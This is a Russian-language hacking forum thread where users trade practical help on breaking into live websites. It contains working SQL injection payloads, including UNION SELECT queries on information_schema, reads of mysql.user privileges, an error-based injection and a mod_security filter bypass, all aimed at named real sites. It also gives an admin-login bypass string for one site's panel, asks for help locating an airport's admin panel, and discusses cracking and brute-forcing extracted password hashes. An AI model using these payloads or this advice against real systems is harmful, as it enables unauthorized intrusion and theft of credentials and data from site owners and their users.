Ваши вопросы по уязвимостям.

вот этот скрин: http://trueimages.ru/img/80/6f/1ec59bd54f1b3ca61fbba93205c.jpg
фильтрация недостаточная раз пропускает все символы, вследствии чего можно сделать вывод что cross-site-scripting возможен.

 

значит таблицы в другой базе.

1. Узнаем базу под которой работает необходимая таблица
id=1+union+select+1,2,3,4,5,6,7,8,table_schema+from+information_schema.tables+where+table_name='имя_таблицы'--

2. Делаем запрос
id=1+union+select+1,userid,3,4,5,6,7,8,9,10+from+имя_базы.ftpuser--

 

Помогите раскрутить
Не могу вывести колумны. По коунт кол-во 453, могу посмотреть.Вывести не могу.
Стял mod_security, обошел, а вот что еще фильтруется не пойму.

 

http://littlehouseofhats.us/collection_details.php?ID=-130'+/*!UNION*/+SELECT+COLUMN_NAME,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+10,1%23

 

привет, подскажите в пм вход в админку http://www.fortline.ru/ , пожалуйста

 

https://www.fortline.ru/manager/
+
http://www.fortline.ru/cms/index.php
------------------
LOGIN: 1' or 1=1# 1
PASS: hgfjhgjtgfjthitufikjk


+в админке sql inj.
http://www.fortline.ru/cms/edit_cl.php?id=9'+or+(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2)))--+

P.S http://www.fortline.ru/cms/access.php

 

Слушай класс, а не можешь какой-нибудь мануал по такой уязвимости скинуть? Как так?
И вот такой вопрос на неком сайте вставляю такую же конструкцию, он мне выдает:
Введите Ваш логин и пароль 1\' or 1=1# 1
Тесть к кавычке подставляет слеш, как обойти?

 

О боже. В наше время, уже доволько редко встречается. В твоем случае, скорее всего там есть фильтрация... скорее всего, даже можеш не пытатся or-ом)).

 

Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?

 

Code:

select concat(user,0x2f,FILE_PRIV) from mysql.user limit 1,1--

 

Проверяем права на запись и чтение файлов
id=1+union+select+1,2,3,4,file_priv+from+mysql.user+where+user='root'--
Y-есть права
N-нет прав

 

а поиск на форуме поискать влом? сколько можно на одни и те же вопросы отвечать....просто 3.14здец полнейший...опять каникулы что ли?

 

Вы несколько не правы, так как может быть несколько юзеров и соответственно различные права, поэтому нужно узнать под кем мы сидим, для этого используется
id=1+union+select+1,2,3,4,user()--
а затем уже проверять конкретного
id=1+union+select+1,2,3,4,file_priv+from+mysql.user+where+user='наш юзер под которым сидим'--

 

Не думаю. Обычно параноики юзают NoScript, или просто тупо отрубают жабу.

 

Так помогите найти админку то на http://www.pulkovoairport.ru/, нужно очень срочно!

 

Вытащил из БД хэш,расшифровал,при авторизации выдает ошибку.
Зарегистрировался там,вытащил свой хэш,при расшифровке не сходится с моим паролем.
Что тут такое ?

 

Мож тупо совпадение, что удалось сбрутить, и там есть соль ?

 

Не знаю даже,помимо колонки password,откуда достал хэш,есть еще колонка hash,но оттуда что-то ничего не выводится

 

ищи колумны password:hash:salt
или скинь в ПМ линк посмотрю и сбручу твой пароль )

 

подскажите пожалуйста что это за уязвимость

PHP:

http://userttool-258-www.bigpoint.net/